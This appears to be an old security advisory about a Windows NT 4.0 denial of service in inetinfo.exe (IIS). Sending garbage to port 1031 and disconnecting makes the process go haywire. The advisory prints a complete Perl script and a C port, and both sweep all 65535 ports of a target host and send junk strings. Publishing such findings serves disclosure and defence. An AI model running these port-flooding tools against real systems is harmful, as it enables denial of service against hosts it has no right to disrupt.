COMMAND

    inetinfo.exe

SYSTEMS AFFECTED

    Win NT 4.0

PROBLEM

    Looks like  NT is  also vulnerable  to exactly  the same attack as
    previously posted connecting and  throwing garbage at port  135 on
    another port,  namely 1031  (inetinfo).   The inetinfo.exe process
    goes insane on NT4.0.  This seems to be exploitable only locally.

    To try, telnet  to 1031 on  an NT machine  and type garbage,  then
    disconnect.  Credit for this  goes to Bob Beck.   David Litchfield
    added how you  don't even need  to type garbage...all  you need to
    do is telnet  to port 1031  and then disconnect.....does  the same
    job (localhost only  and it's not  always port 1031  as IIS choose
    these ports  randomly).   Below is  what Bob  Beck and Chris Bayly
    rigged up to check:

        #!/usr/local/bin/perl

        use Socket;
        use FileHandle;
        require "chat2.pl";

        $ILoveBill = $ARGV[0] && shift;

        $verbose = 0; # tell me what you're hitting
        $knownports = 0;  # don't hit known problem ports
        for ($port = $0; $port <65535; $port++)
        {

          if ($knownports && ($port == 135 || $port== 1031)) {
               next;
          }
          $fh = chat::open_port($ILoveBill, $port);
          chat::print ($fh,"Windows NT is the platform of the future");
          if ($verbose) {
                   print "Trying port: $port\n\n";
          }
          chat::close($fh);
        }

    Evan L. Carew posted the following code that's ported version
    of code above (tested under Linux with GCC v2.7.2.3).

    /* This program  is not intended  to be used  to bring down NT  */
    /* servers or WIN95  clients but rather as  a tool for finding  */
    /* weaknesses in your installations */

    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <string.h>
    #include <netdb.h>
    #include <stdio.h>

    #define MAXPORTNUM 65535

    int main (int argc, char **argv){
      int n, s, len;
      u_short soc = 0;
      char buf[1024];
      char *hostname;
      struct hostent *hp;
      struct sockaddr_in name;

      if(argc < 2){
        printf("Usage: %s hostname [hostname]\n", *argv);
        exit(1);
      }
      hostname = *++argv;
      hp = gethostbyname(hostname);
      soc = 1;

      while (soc <= MAXPORTNUM){
        /* create a socket */
        s = socket(AF_INET, SOCK_STREAM, 0);

        memset(&name, 0, sizeof(struct sockaddr_in));
        name.sin_family = AF_INET;
        name.sin_port = htons(soc);
        memcpy(&name.sin_addr, hp->h_addr_list[0], hp->h_length);
        len = sizeof(struct sockaddr_in);

        printf("Trying port %i\n", soc);
        if (!connect(s, (struct sockaddr *)&name, len)){
          printf("connected to port %i\n", soc);
          strcpy(buf, "jfiebnfvmrur84j dfj494 40wetnt");
          len = strlen(buf);
          n = send(s, buf, len, 0);
        }
        close(s);
        ++soc;
      }
      exit(0);
    }

SOLUTION

    Not available at this moment.  Anyway, see if You need vulenarable
    ports.  If You don't, GREAT and disable them!